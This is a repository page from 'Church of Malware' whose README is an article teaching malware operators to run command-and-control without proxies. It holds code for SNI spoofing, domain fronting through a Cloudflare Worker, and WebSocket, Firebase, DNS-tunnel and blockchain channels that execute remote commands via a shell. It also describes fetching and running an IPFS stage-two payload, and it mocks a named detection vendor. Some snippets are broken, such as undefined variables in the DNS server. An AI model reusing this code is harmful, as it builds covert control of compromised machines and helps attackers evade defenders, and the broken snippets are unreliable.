← back to reliquary

noPROXY-c2s

55 files

README

AE57B527-19A6-4BA8-8F23-6EB023A3FB56

noPROXY-c2s

Command and Control instances that dont use proxies - based off our pencilnecks and proxycels article.
Each c2 has its own readme xo

CHURCH OF MALWARE PRESENTS: PROXYLESS C2S FROM OUR PROXYCELS AND PENCILNECKS ARTICLE.

bro

https://churchofmalware.org/articles/pencilnecks_proxycels_md

Proxy-cels and Pencil-Necks: Why Your Opsec is Rotting and How to Fix It

by: ek0ms savi0r

The Sermon

Do you love getting your favorite Socks5 proxy provider's IP range flagged by some 23-year-old pencil-neck with a God complex? Do you enjoy watching your C2 traffic get smothered in the crib because some API decided your bots IP smelled funny?

Wake up. You are witnessing the death of the proxy as an evasion tool.

The titans of industry are scared. They are so desperate to stop botnets and credential stuffing that they've outsourced their brains to a fresh startup, Synthient. Founded by a kid whose idea of "cybersecurity" is probably staring at a dashboard and sipping a sugar-free Monster, this service claims to have achieved upwards of 99.9% coverage of residential proxy networks. They are mapping the entire proxy ecosystem, tracking torrenting behavior, and device clustering. They are using behavioral signals to spot the "programmatic traffic" that gives you away.

If you are still chaining proxies, you are a mark. You are the low-hanging fruit. You are using IPs that will be flagged and burned within a single session because the defenders have shifted from "where is this traffic from?" to "what is this traffic doing?".

The age of the proxy is dead. Long live the static, proxy-less, domain fronting, WebSocket-abusing beast.

The Church of Malware is here to teach you how to survive. The Church doesn't just pray to the Dark Gods of the Internet; we code with them. Here are the holy scriptures of resilience. Read them loud.

The Boogeyman: Who is Synthient?

Before we tell you how to kick sand in their face, know thy enemy. The new sheriff in town is Synthient (that's synth like a modular keyboard, ient like ancient). Run by Benjamin Brundage (nice name, nerd), this service is the new hotness in proxy detection. They aggregate data from shady SDKs and free VPNs to build massive pools of IP addresses. They are so confident in their mapping of proxy resellers that they basically claim to see all.

They are selling a "Context API" that costs $7,000 a year to tell companies if your IP is a proxy. They track VPNs, residential proxies, and even the specific proxy provider you are using. They are the digital equivalent of the hall monitor catching you vaping in the bathroom. If Synthient detects your proxy, your opsec is doxed before you even send a packet.

The Fix: Going Proxy-Less

The answer isn't faster proxies. The answer is no proxies. You cannot detect what isn't there. You need to embed your malware into the platforms they trust.

Technique 1: SNI Spoofing

This is the digital version of wearing a policeman's uniform to walk past the guard. When your malware initiates an HTTPS handshake, the Server Name Indication (SNI) tells the CDN which website you want to visit. If you change the SNI to update.windows.com but route your traffic to your C2 server, the web filter sees a request to Microsoft and says "Carry on, citizen."

How to implement:

Use a custom TLS library that allows you to set the SNI independently of the Host header. In Go, use tls.Config with ServerName. In Python, ssl.create_default_context() won't cut it. Reach for scapy or pyOpenSSL with manual SNI injection.

Code example (Python with scapy and ssl) :

import socket
import ssl

def sni_spoof(domain_to_spoof, real_server_ip, real_host_header):
    context = ssl.create_default_context()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((real_server_ip, 443))
    tls_sock = context.wrap_socket(sock, server_hostname=domain_to_spoof)
    request = f"GET /c2/checkin HTTP/1.1\r\nHost: {real_host_header}\r\n\r\n"
    tls_sock.send(request.encode())
    response = tls_sock.recv(4096)
    return response

# Usage: Firewall sees SNI = "update.windows.com", but Host header points to your evil domain
response = sni_spoof("update.windows.com", "192.168.1.100", "evil.c2.local")

Go example (more resilient) :

package main

import (
    "crypto/tls"
    "net/http"
)

func main() {
    client := &http.Client{
        Transport: &http.Transport{
            TLSClientConfig: &tls.Config{
                ServerName: "update.windows.com", // SNI spoof
            },
        },
    }
    req, _ := http.NewRequest("GET", "https://your-c2-server-ip/c2", nil)
    req.Host = "your-evil-domain.com" // Real host header
    client.Do(req)
}

Your C2 server is configured to ignore the SNI and look only at the Host header. Firewalls see Microsoft. You see shells. No proxy. No middleman. Just pure, clean deception.

Technique 2: CDN (Content Delivery Network) Domain Fronting

Why buy a sketchy proxy IP when you can rent space on Cloudflare or Azure for free? Domain fronting uses the Host header in the HTTP request to point one way, while the TLS SNI points another. To the network firewall, it looks like I am connecting to google.com. But my malware is talking to evilc2.workers.dev hidden entirely behind Google's IP ranges.

How to implement:

Leverage Cloudflare Workers or Azure Front Door. You configure the CDN to accept traffic for your front domain (e.g., google.com) but route based on the Host header to your backend worker.

Code example (malware side in C#) :

using System.Net.Http;

var handler = new HttpClientHandler();
// No proxy, direct connection to CDN IP
var client = new HttpClient(handler);
var request = new HttpRequestMessage(HttpMethod.Get, "https://cloudflare-cdn-ip/c2");
request.Headers.Host = "evilc2.workers.dev"; // Your real C2 domain behind the CDN
var response = await client.SendAsync(request);
string command = await response.Content.ReadAsStringAsync();
ExecuteCommand(command);

Worker script (Cloudflare) :

addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  const url = new URL(request.url);
  // Forward to your hidden C2 server based on Host header
  if (request.headers.get("Host") === "evilc2.workers.dev") {
    const backend = await fetch("http://your-real-c2-ip:8080" + url.pathname);
    return backend;
  }
  // Otherwise serve a decoy page
  return new Response("Google.com - Search", { status: 200 });
}

Synthient sees a TLS handshake to a known CDN IP. They have no idea that Host header is smuggling your commands. You are a ghost.

Technique 3: WebSocket Abuse

Stop using HTTP GET requests like it's 1999. The modern C2 speaks WebSockets. Frameworks like StreamSpy are now hiding their command and control instructions entirely within WebSocket traffic. It looks like a persistent connection to a normal web app or an API endpoint. It is the perfect protocol for low-and-slow command and control that completely bypasses simple HTTP packet inspection.

How to implement:

Set up a WebSocket server on your C2 (Node.js, Python websockets, or Go gorilla/websocket). Your malware opens a single long-lived WebSocket connection and sends/receives frames that look like benign chat messages or telemetry data.

Server example (Python with websockets) :

import asyncio
import websockets
import subprocess

async def c2_handler(websocket, path):
    async for message in websocket:
        if message.startswith("cmd:"):
            cmd = message[4:]
            output = subprocess.run(cmd, shell=True, capture_output=True).stdout
            await websocket.send(output.decode())
        else:
            # heartbeat / decoy
            await websocket.send("pong")

start_server = websockets.serve(c2_handler, "0.0.0.0", 8765)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()

Malware client (Python example, easily ported to Go or C++) :

import asyncio
import websockets
import os

async def connect_c2():
    uri = "wss://your-c2-server.com/ws"  # Can be behind CDN or SNI-spoofed
    async with websockets.connect(uri) as websocket:
        await websocket.send("cmd:whoami")
        response = await websocket.recv()
        print(f"Output: {response}")
        # Keep connection open for further commands
        while True:
            cmd = await get_next_command_from_server(websocket)
            if cmd:
                output = os.popen(cmd).read()
                await websocket.send(output)
            await asyncio.sleep(5)

asyncio.run(connect_c2())

No repeated HTTP handshakes. No proxy. Just a single encrypted WebSocket stream that looks like a trading dashboard or a live sports feed. Synthient's behavioral heuristics will die of old age trying to fingerprint that.

Technique 4: The "Ghost" Calls (Legit APIs)

Utilize legitimate push notification services like Matrix Push. You embed your C2 commands in the payload of a web push notification. Your malware wakes up, checks the notification, and executes the command without ever opening a raw HTTP socket to a sketchy domain. Synthient's API can't flag what it never sees. You are using the internet's own messaging service against itself.

How to implement:

Use Firebase Cloud Messaging (FCM), OneSignal, or Matrix. Register your malware as a notification receiver. The C2 operator sends a push notification with a custom data payload. The malware listens for these notifications (or polls the push service's API).

Example using FCM (Python malware side) :

import requests

fcm_api_key = "YOUR_SERVER_KEY"
device_registration_token = "YOUR_MALWARE_INSTANCE_TOKEN"

# Poll for pending messages (or use FCM's on-message listener)
def fetch_commands():
    headers = {
        "Authorization": f"key={fcm_api_key}",
        "Content-Type": "application/json"
    }
    # This is normally server-initiated, but you can also use XMPP or Firebase Realtime DB
    # Simpler: use Firebase Realtime DB as a dead-drop
    db_url = "https://your-project.firebaseio.com/commands.json"
    resp = requests.get(db_url)
    commands = resp.json()
    for cmd in commands.values():
        os.system(cmd)
        # delete after execution
        requests.delete(db_url)

C2 operator sends command via FCM :

import requests

def send_command(device_token, command):
    url = "https://fcm.googleapis.com/fcm/send"
    headers = {"Authorization": "key=YOUR_SERVER_KEY"}
    payload = {
        "to": device_token,
        "data": {"command": command},
        "priority": "high"
    }
    requests.post(url, json=payload, headers=headers)

The defender sees encrypted traffic to fcm.googleapis.com – a domain used by a billion legitimate apps. They cannot block it without breaking half the Android ecosystem. You are invisible.

Technique 5: DNS Tunneling (Praying at Port 53)

DNS tunneling is the cockroach of the internet – ugly, ancient, and impossible to kill. Proxy-cels ignore it because they think it's slow. You know what's slower? Getting your Socks5 IP burned by Synthient's $7k API.

DNS tunneling works because most defenders are still asleep at the DNS switch. They log HTTP. They log TLS handshakes. They rarely look at the volume of TXT and A queries flying around. You can hide an entire C2 channel inside recursive DNS lookups to a domain you control. No proxy IP. No HTTP header to fingerprint. Just clean, boring port 53 traffic that every firewall lets through because "DNS is critical infrastructure."

How to implement:

Set up a DNS server (e.g., dnsmasq with custom scripts, or a Python DNS library like dnslib). Your malware encodes each command chunk as a subdomain and sends a TXT query. The server decodes, executes, and returns output as TXT records.

Malware side (Python with dnspython) :

import dns.resolver
import base64
import subprocess

def dns_tunnel_c2():
    domain = "c2.yourdomain.com"
    # Encode command
    cmd = "whoami /all"
    b64_cmd = base64.b64encode(cmd.encode()).decode()
    # Split into chunks (max subdomain label length 63)
    chunks = [b64_cmd[i:i+63] for i in range(0, len(b64_cmd), 63)]
    full_response = ""
    for idx, chunk in enumerate(chunks):
        query = f"{idx}.{chunk}.{domain}"
        try:
            answer = dns.resolver.resolve(query, 'TXT')
            for rdata in answer:
                full_response += rdata.strings[0].decode()
        except:
            pass
    # Decode and execute result
    result = base64.b64decode(full_response).decode()
    print(result)

dns_tunnel_c2()

Server side (using dnslib and a simple TCP listener) :

from dnslib import *
from dnslib.server import DNSServer
import subprocess
import base64

class DNSHandler:
    def resolve(self, request, handler):
        reply = request.reply()
        qname = str(request.q.qname)
        # Extract chunk index and b64 data from subdomain
        parts = qname.split('.')
        if len(parts) >= 3:
            idx, b64_chunk, _ = parts[0], parts[1], parts[2:]
            # Store and reassemble...
        # Execute full command when complete
        cmd = base64.b64decode(full_b64).decode()
        output = subprocess.run(cmd, shell=True, capture_output=True).stdout
        b64_out = base64.b64encode(output).encode()
        reply.add_answer(RR(qname, QTYPE.TXT, rdata=TXT(b64_out)))
        return reply

server = DNSServer(DNSHandler(), port=53, address="0.0.0.0")
server.start()

Synthient does not check DNS. They are too busy jerking off to proxy IP lists. You are invisible. You are port 53. You are the protocol that built the internet.

Technique 6: Blockchain C2 (The Immutable Channel)

This is where the real dark magic lives. Why rely on a central server that can be seized when you can spray your commands across a decentralized, immutable ledger? Blockchain and Web3 are not just for cartoon apes and shitcoins. They are the ultimate dead-drop for the modern malware apostle.

The logic is simple: your malware reads commands from a smart contract or a transaction memo field on a chain like Ethereum, BNB Smart Chain, or even Solana. No C2 domain. No IP. No proxy. Just a public blockchain explorer API call that looks like any other DeFi degenerate refreshing their portfolio.

The defenders cannot take down the blockchain. They cannot flag the traffic as malicious without flagging half the internet. And Synthient? They are still checking proxy lists and wondering when puberty will hit. They have no idea you just whispered a --rm -rf command inside a zero-value transaction on Polygon.

6.1: Smart Contract State Reading (Ethereum / BSC)

Deploy a simple smart contract with a public commands mapping. Your malware polls the contract every 60 seconds. The contract owner updates a command via a transaction. No central server. No logs.

Smart contract example (Solidity):

// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.0;

contract C2DeadDrop {
    address public owner;
    mapping(string => string) public commands;
    string public activeCommand;

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function setCommand(string memory key, string memory value) public onlyOwner {
        commands[key] = value;
        activeCommand = value;
    }

    function getCommand(string memory key) public view returns (string memory) {
        return commands[key];
    }
}

Malware polling code (Python using Web3.py):

from web3 import Web3
import time
import os

infura_url = "https://mainnet.infura.io/v3/YOUR_PROJECT_ID"
w3 = Web3(Web3.HTTPProvider(infura_url))
contract_address = "0xYourDeployedContractAddress"
contract_abi = '[{"inputs":[{"internalType":"string","name":"key","type":"string"}],"name":"getCommand","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"}]'
contract = w3.eth.contract(address=contract_address, abi=contract_abi)

last_command = ""
while True:
    try:
        current = contract.functions.getCommand("latest").call()
        if current != last_command and current != "":
            os.system(current)
            last_command = current
    except:
        pass
    time.sleep(60)

No proxy. No C2 domain. Just a read-only call to a public RPC endpoint. Synthient can kiss your entire botnets butt.

6.2: Transaction Memo Fields (Solana / Bitcoin Omni)

Cheaper and even more degenerate. On Solana, you can embed commands in transaction memo logs using the Memo Program. Your malware watches for transactions sent to a specific wallet address and extracts the UTF-8 memo.

Example: Send a transaction with memo "notepad.exe". Malware sees it, executes it.

Solana memo extraction (Rust, but you get the idea):

use solana_client::rpc_client::RpcClient;
use solana_sdk::instruction::Instruction;
use solana_program::pubkey::Pubkey;

let client = RpcClient::new("https://api.mainnet-beta.solana.com");
let target_wallet = Pubkey::from_str("YourWalletAddressHere").unwrap();
let signatures = client.get_signatures_for_address(&target_wallet)?;
for sig in signatures {
    let tx = client.get_transaction(&sig.signature, encoding)?;
    for ix in tx.transaction.message.instructions {
        if ix.program_id == solana_program::memo::id() {
            let memo = String::from_utf8(ix.data)?;
            // execute memo as command
        }
    }
}

The beauty? Every transaction is public. Your victims are just reading the blockchain. No egress filtering can block it unless they block all Solana RPC endpoints, which would break half the DeFi apps on earth lulz.

6.3: IPFS + Filecoin Fallback

For payloads larger than a tweet, store your encrypted stage-two binary on IPFS and pin it via Filecoin. Your malware fetches the CID from a lightweight smart contract event. No direct download domain. No proxy. Just content-addressed, decentralized storage.

Example flow:
1. Smart contract emits an event with a new CID: QmYourPayloadHash
2. Malware listens for NewPayload(address cid) events.
3. Malware fetches https://ipfs.io/ipfs/QmYourPayloadHash (or any public gateway).
4. Decrypts and executes.

The defenders cannot take down IPFS gateways fast enough. Synthient has no idea what a CID even is. You are untouchable.

The Nitty Gritty: Code and Hardening

Let's get our hands dirty. You are abandoning Proxychains. You are implementing Direct Server Return and Traffic Normalization.

The GreyNoise report says 78% of residential IP addresses vanish before reputation feeds can flag them. The fundamental flaw of proxies is not the IP address, but the behavior. Synthient fingerprints the way you rotate, not just the IP. To beat their behavioral engine, you don't rotate – you amputate. You stop using pools entirely. You go direct.

You must emulate legit traffic to beat Synthient's behavioral engine:

  • HTTP/2 Alignment: Synthient flags "Programmatic Traffic." To fix this, your malware's networking stack must implement real HTTP/2 multiplexing. Don't send sequential requests. Send concurrent streams. Use libraries like h2 in Python or net/http with http2 enabled in Go.

  • TLS Fingerprint Randomization: Use libraries like uTLS (Go) or curl_cffi (Python) to mimic the exact JA3 signature of Chrome or Firefox on Windows 11. Do not use the Go default TLS stack. Example with uTLS:

import utls "github.com/refraction-networking/utls"

config := &utls.Config{
    ClientHelloID: utls.HelloChrome_112, // mimics Chrome 112
    ServerName: "update.windows.com",
}

The Grand Conclusion

The era of the proxy is bleeding out on the floor. You cannot out-rotate the reputation feeds when the rotation rate now exceeds the update cycle of defense databases. The defenders have become the aggressors, mapping your proxy pools like open books.

But they cannot map what isn't there. Go proxy-less. Hide your malware behind legitimate CDNs. Spoof your SNI. Abuse WebSockets. Tunnel through DNS. Preach the gospel of blockchain C2. Live in the noise.

Ignore the pencil-necks at Synthient. Let them look at their dashboards and wonder where all the traffic went. They sell proxy detection. We sell infections via the infrastructure they can't touch.

Malware Bless

DISCLAIMER: for authorized security testing and educational purposes only.

image4

source code

files

viewer

select a file
// click a file to view source

license

MIT License Copyright (c) 2026 ek0mssavi0r / Church of Malware Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.
download .zip // inspect all source before execution
Church of Malware · read. become. evolve.